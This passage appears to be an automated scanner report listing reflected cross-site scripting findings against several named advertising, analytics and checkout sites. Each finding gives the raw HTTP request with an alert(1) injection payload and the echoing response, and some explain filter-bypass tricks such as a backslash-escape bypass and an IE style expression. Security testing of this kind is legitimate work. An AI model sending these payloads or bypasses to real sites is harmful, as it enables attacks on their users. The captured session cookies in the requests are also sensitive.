This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_28966886c33<script>alert(1)</script>797754eeb HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A16F926F5AA4C8CAA4023FBBBAB7879A; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:23:18 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_28966886c33<script>alert(1)</script>797754eeb".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_28966886c33<script>
...[SNIP]...

5.2. http://an.yandex.ru/code/47934 [target-ref parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://an.yandex.ru
Path:	/code/47934

Issue detail

The value of the target-ref request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de788(a)f60c8b163e7 was submitted in the target-ref parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /code/47934?rnd=33486&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=de788(a)f60c8b163e7&grab=dNCh0YDQtdC00L3QuNC1INC4INGC0Y_QttC10LvRi9C1INCz0YDRg9C30L7QstC40LrQuCDQsiDRgNC10LPQuNC-0L3QtSDQktGB0Y8g0KDQvtGB0YHQuNGPIC0g0L7QsdGK0Y_QstC70LXQvdC40Y8g0L3QsCBUcnVja2xpc3QucnUKMdCe0LHRitGP0LLQu9C10L3QuNGPIMK7wqAg0KHRgNC10LTQvdC40LUg0Lgg0YLRj9C20LXQu9GL0LUg0LPRgNGD0LfQvtCy0LjQutC4IAoyCjPQn9GA0LXQvNC40YPQvC3QvtCx0YrRj9Cy0LvQtdC90LjRjyA= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 14:47:53 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:47:53 GMT
Expires: Mon, 25 Apr 2011 14:47:53 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=windows-1251
Content-Length: 67

5.3. http://an.yandex.ru/code/57617 [target-ref parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://an.yandex.ru
Path:	/code/57617

Issue detail

The value of the target-ref request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ff26(a)615e8e384bf was submitted in the target-ref parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /code/57617?rnd=29605&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=2ff26(a)615e8e384bf&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/news.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 14:22:57 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:22:57 GMT
Expires: Mon, 25 Apr 2011 14:22:57 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=windows-1251
Content-Length: 67

5.4. http://an.yandex.ru/code/66894 [target-ref parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://an.yandex.ru
Path:	/code/66894

Issue detail

The value of the target-ref request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ad56b(a)20328a529f was submitted in the target-ref parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /code/66894?rnd=148599&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=ad56b(a)20328a529f&grab=dNCf0L7Qs9C-0LTQsCDQvdCwIHdlYmFsdGEucnU= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 14:24:47 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:24:47 GMT
Expires: Mon, 25 Apr 2011 14:24:47 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=windows-1251
Content-Length: 66

5.5. http://ar.voicefive.com/b/rc.pli [func parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 97042<script>alert(1)</script>906f6279423 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction97042<script>alert(1)</script>906f6279423&n=ar_int_p97174789&1303741250889 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:31:28 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction97042<script>alert(1)</script>906f6279423("");

5.6. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/core/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 21856'%20style%3dx%3aexpression(alert(1))%20b662ee241cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21856\' style=x:expression(alert(1)) b662ee241cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /core/?21856'%20style%3dx%3aexpression(alert(1))%20b662ee241cf=1 HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; NLVisitorId=rcHW8495AWICDiX0; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:05:45 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110531729:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=VXMTN1NJZvQ6fx6SQq6bnR2Yztv7L6v79G1pNDsYlHnL2NW1VbWYQynfwrCTfhNmdJf0N1pvRxWRVBGXCQTGYT0LZTpCPytnGtVysYRypnS56r06v0mkRXCmkzXVSVrd!-620026609; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 15:05:45 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2422

<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<a href='/s.nl?alias=core&21856\' style=x:expression(alert(1)) b662ee241cf=1&21856\'%20style%3dx%3aexpression(alert(1))%20b662ee241cf=1'>
...[SNIP]...

5.7. https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/core/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8226f\'%3balert(1)//b3b0eb2a796 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8226f\\';alert(1)//b3b0eb2a796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /core/?8226f\'%3balert(1)//b3b0eb2a796=1 HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; NLVisitorId=rcHW8495AWICDiX0; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:05:57 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -704362580:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=byykN1NVD9GV54JxSWRsMvBTxhWWpyzhrfD56p2fM5lLyD4ZGXvzTLJXNyy8xh2F9cPqgPJ6sWyNTvPshQdv6JWL4dS2RpvcpfkcVvY52cFxxGhFrYTp9bLnXcvfQsy5!-620026609; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 15:05:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2338

<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
<script language='Javascript' type='text/javascript'>document.location.href='/s.nl?alias=core&8226f\\';alert(1)//b3b0eb2a796=1&8226f\\'%3balert(1)//b3b0eb2a796=1&redirect_count=1&did_javascript_redirect=T'</script>
...[SNIP]...

5.8. http://ds.addthis.com/red/psi/sites/www.kronos.com/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.kronos.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload caea3<script>alert(1)</script>a8615876143 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.kronos.com/p.json?callback=_ate.ad.hprcaea3<script>alert(1)</script>a8615876143&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.kronos.com%2Fabout%2Fabout-kronos.aspx&zzr8oz HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1303662902.1FE|1303662902.1OD|1303662902.60; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 25 Apr 2011 13:51:39 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 25 May 2011 13:51:39 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 25 Apr 2011 13:51:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 13:51:39 GMT
Connection: close

_ate.ad.hprcaea3<script>alert(1)</script>a8615876143({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

5.9. http://event.adxpose.com/event.flow [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 35b4c<script>alert(1)</script>b4350c97119 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-1134822682510879%26output%3Dhtml%26h%3D600%26slotname%3D3061072279%26w%3D160%26lmt%3D1303759227%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fgames.webalta.ru%252F%26dt%3D1303741227549%26bpp%3D5%26shv%3Dr20110420%26jsv%3Dr20110415%26correlator%3D1303741227571%26frm%3D0%26adk%3D1110337129%26ga_vid%3D973557293.1303741228%26ga_sid%3D1303741228%26ga_hid%3D154889240%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1125%26bih%3D929%26fu%3D0%26ifi%3D1%26dtd%3D35%26xpc%3DnaYdoqC7iz%26p%3Dhttp%253A%2F%2Fgames.webalta.ru&uid=ZC45X9Axu6NOUFfX_28966835b4c<script>alert(1)</script>b4350c97119&xy=0%2C0&wh=160%2C600&vchannel=69113&cid=166308&iad=1303741233200-54504055902361870&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=79DACCAB16BC495962702839F5429393; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Mon, 25 Apr 2011 14:23:59 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_28966835b4c<script>alert(1)</script>b4350c97119");

5.10. https://hourly.deploy.com/hmc/report/ ['"--> parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The value of the '"--></style></script><script>netsparker(0x000054)</script> request parameter is copied into the HTML document as plain text between tags. The payload e3cac<script>alert(1)</script>5fcd26dde92 was submitted in the '"--></style></script><script>netsparker(0x000054)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?'"--></style></script><script>netsparker(0x000054)</script>e3cac<script>alert(1)</script>5fcd26dde92 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
</script>e3cac<script>alert(1)</script>5fcd26dde92" method="post">
...[SNIP]...

5.11. https://hourly.deploy.com/hmc/report/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 955ef"><script>alert(1)</script>eaec9f444c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?955ef"><script>alert(1)</script>eaec9f444c3=1 HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:32 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d830da3836cd39735b3d;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:32 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:32 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4880

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?955ef"><script>alert(1)</script>eaec9f444c3=1" method="post">
...[SNIP]...

5.12. https://hourly.deploy.com/hmc/report/ [nsextt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ff7d"><script>alert(1)</script>22906d443c3 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000002)%3C/script%3E8ff7d"><script>alert(1)</script>22906d443c3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:41 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000002)%3c/script%3e8ff7d"><script>alert(1)</script>22906d443c3" method="post">
...[SNIP]...

5.13. https://hourly.deploy.com/hmc/report/ [register parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The value of the register request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7121"><script>alert(1)</script>df0c78cb9fa was submitted in the register parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/?register=1e7121"><script>alert(1)</script>df0c78cb9fa HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
